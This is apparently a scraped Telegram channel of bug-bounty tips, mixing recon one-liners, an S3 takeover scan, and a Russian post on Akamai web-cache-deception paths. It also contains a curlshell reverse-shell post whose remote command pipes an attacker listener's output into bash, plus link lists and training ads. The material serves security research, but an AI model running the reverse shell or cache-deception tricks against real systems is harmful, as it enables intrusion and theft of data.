es
Feedback
Bug bounty Tips

Bug bounty Tips

Ir al canal en Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Mostrar más
5 855
Suscriptores
+624 horas
+707 días
+36030 días
Archivo de publicaciones
Hey! After a long break, i am back with some BugBounty notes, on reconnaissance with the list of tools and Its technique. htt
Hey! After a long break, i am back with some BugBounty notes, on reconnaissance with the list of tools and Its technique. https://book.cipherops.tech/bug-bounty-notes/series-on-the-power-of-reconnaissance-tools

Don't Ignore wordpress websites :) Payload:

Fingerprinting with Shodan and Nuclei engine: > shodan domain tesla.com | awk '{print $3}' | httpx -silent | nuclei > shodan domain tesla.com | awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ > shodan search org:"google"  --fields ip_str,port --separator " " | awk '{print $1":"$2}' #bugbounty #bugbountytips

Repost from #bugbountytips
Иногда, если ответ «404 Not found», Akamai кэширует ответ менее чем на 10 секунд, что усложняет задачу. В этом случае злоумышленник должен быть быстрым. Однако, если Akamai обнаружит ответ 200 OK, он будет храниться не менее 24 часов. Совет: В некоторых приложениях, если вы добавите точку с запятой (;) перед расширением, это может дать вам ответ 200 OK. Например
/xxxx/xxxxxx/;.js?test
/xxxx/xxxxxx/;.css?test

или (обход 403 при попытке закешировать)
/xxxx/xxxxxx/;%2ejs?test
/xxxx/xxxxxx/;%2ecss?test

Мы получим HTTP/2 200 ОК и сохраним ответ в кэш на 24 часа.

curlshell reverse shell using curl * usage: * Start your listener: ./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234 On the remote side: curl https://curlshell:1234 | bash download #shell #curl

Owasp Top 10 Vulnerabilities.pdf2.30 MB

#bugbountytips Scan for s3 bucket takeover vulnerabilities > subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt

#bugbountytips 1. Finding More IDORs – Tips And Tricks ($100/Day) 2. How-i-found-XSS-on-admin-page-without-login? 3. Reconnaissance to Remote Code Execution 4. How I get +10 SQLi and +30 XSS via Automation Tool? 5. IDOR is Everywhere 😁 6. $300 for Reporting an Unexpected Bug 7. How I hacked one of the biggest airlines group in the world? 8. International company customer PII INFO by AWS metadata access through SSRF 9. I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection 10. I got owned a Multi-Billion Dollar Retailer’s MySQL using SQL Injection

photo content

Guys check out this training and internship program if anyone intrested in do register the for below link. https://forms.gle/
+4
Guys check out this training and internship program if anyone intrested in do register the for below link. https://forms.gle/vr77U7P5REZdDPB37

Check out this guy's we have update our training and internship program on our official website. ➡️Cipherops.tech

If anyone intrested in joining the webinar, do join at sharp 6 PM Webinar link for “unlocking the secrets of Bug Bounty” meet.google.com/rbp-bwsh-mbb

#bugbountytips ( 1/2 ) otx.alienvault.com/indicator/domain/{{domain.com}} on tap Associated Urls ==> show as 100 entries ( 2/2 ) > gau domain.com --subs -o 1234.txt > grep -E '\.(pdf|docx|txt|xlsx|zip|rar|7z|tar|gz|tar.gz|bak|sql|log|key|pem|cfg|conf|ini|env|sh)' 1234.txt

100 web vulnerabilities, categorized into various types: Injection Vulnerabilities: 1. SQL Injection (SQLi) 2. Cross-Site Scripting (XSS) 3. Cross-Site Request Forgery (CSRF) 4. Remote Code Execution (RCE) 5. Command Injection 6. XML Injection 7. LDAP Injection 8. XPath Injection 9. HTML Injection 10. Server-Side Includes (SSI) Injection 11. OS Command Injection 12. Blind SQL Injection 13. Server-Side Template Injection (SSTI) Broken Authentication and Session Management: 14. Session Fixation 15. Brute Force Attack 16. Session Hijacking 17. Password Cracking 18. Weak Password Storage 19. Insecure Authentication 20. Cookie Theft 21. Credential Reuse Sensitive Data Exposure: 22. Inadequate Encryption 23. Insecure Direct Object References (IDOR) 24. Data Leakage 25. Unencrypted Data Storage 26. Missing Security Headers 27. Insecure File Handling Security Misconfiguration: 28. Default Passwords 29. Directory Listing 30. Unprotected API Endpoints 31. Open Ports and Services 32. Improper Access Controls 33. Information Disclosure 34. Unpatched Software 35. Misconfigured CORS 36. HTTP Security Headers Misconfiguration XML-Related Vulnerabilities: 37. XML External Entity (XXE) Injection 38. XML Entity Expansion (XEE) 39. XML Bomb Broken Access Control: 40. Inadequate Authorization 41. Privilege Escalation 42. Insecure Direct Object References 43. Forceful Browsing 44. Missing Function-Level Access Control Insecure Deserialization: 45. Remote Code Execution via Deserialization 46. Data Tampering 47. Object Injection API Security Issues: 48. Insecure API Endpoints 49. API Key Exposure 50. Lack of Rate Limiting 51. Inadequate Input Validation Insecure Communication: 52. Man-in-the-Middle (MITM) Attack 53. Insufficient Transport Layer Security 54. Insecure SSL/TLS Configuration 55. Insecure Communication Protocols Client-Side Vulnerabilities: 56. DOM-based XSS 57. Insecure Cross-Origin Communication 58. Browser Cache Poisoning 59. Clickjacking 60. HTML5 Security Issues Denial of Service (DoS): 61. Distributed Denial of Service (DDoS) 62. Application Layer DoS 63. Resource Exhaustion 64. Slowloris Attack 65. XML Denial of Service Other Web Vulnerabilities: 66. Server-Side Request Forgery (SSRF) 67. HTTP Parameter Pollution (HPP) 68. Insecure Redirects and Forwards 69. File Inclusion Vulnerabilities 70. Security Header Bypass 71. Clickjacking 72. Inadequate Session Timeout 73. Insufficient Logging and Monitoring 74. Business Logic Vulnerabilities 75. API Abuse Mobile Web Vulnerabilities: 76. Insecure Data Storage on Mobile Devices 77. Insecure Data Transmission on Mobile Devices 78. Insecure Mobile API Endpoints 79. Mobile App Reverse Engineering IoT Web Vulnerabilities: 80. Insecure IoT Device Management 81. Weak Authentication on IoT Devices 82. IoT Device Vulnerabilities Web of Things (WoT) Vulnerabilities: 83. Unauthorized Access to Smart Homes 84. IoT Data Privacy Issues Authentication Bypass: 85. Insecure "Remember Me" Functionality 86. CAPTCHA Bypass Server-Side Request Forgery (SSRF): 87. Blind SSRF 88. Time-Based Blind SSRF Content Spoofing: 89. MIME Sniffing 90. X-Content-Type-Options Bypass 91. Content Security Policy (CSP) Bypass Business Logic Flaws: 92. Inconsistent Validation 93. Race Conditions 94. Order Processing Vulnerabilities 95. Price Manipulation 96. Account Enumeration 97. User-Based Flaws Zero-Day Vulnerabilities: 98. Unknown Vulnerabilities 99. Unpatched Vulnerabilities 100. Day-Zero Exploits By @TheGodEye

photo content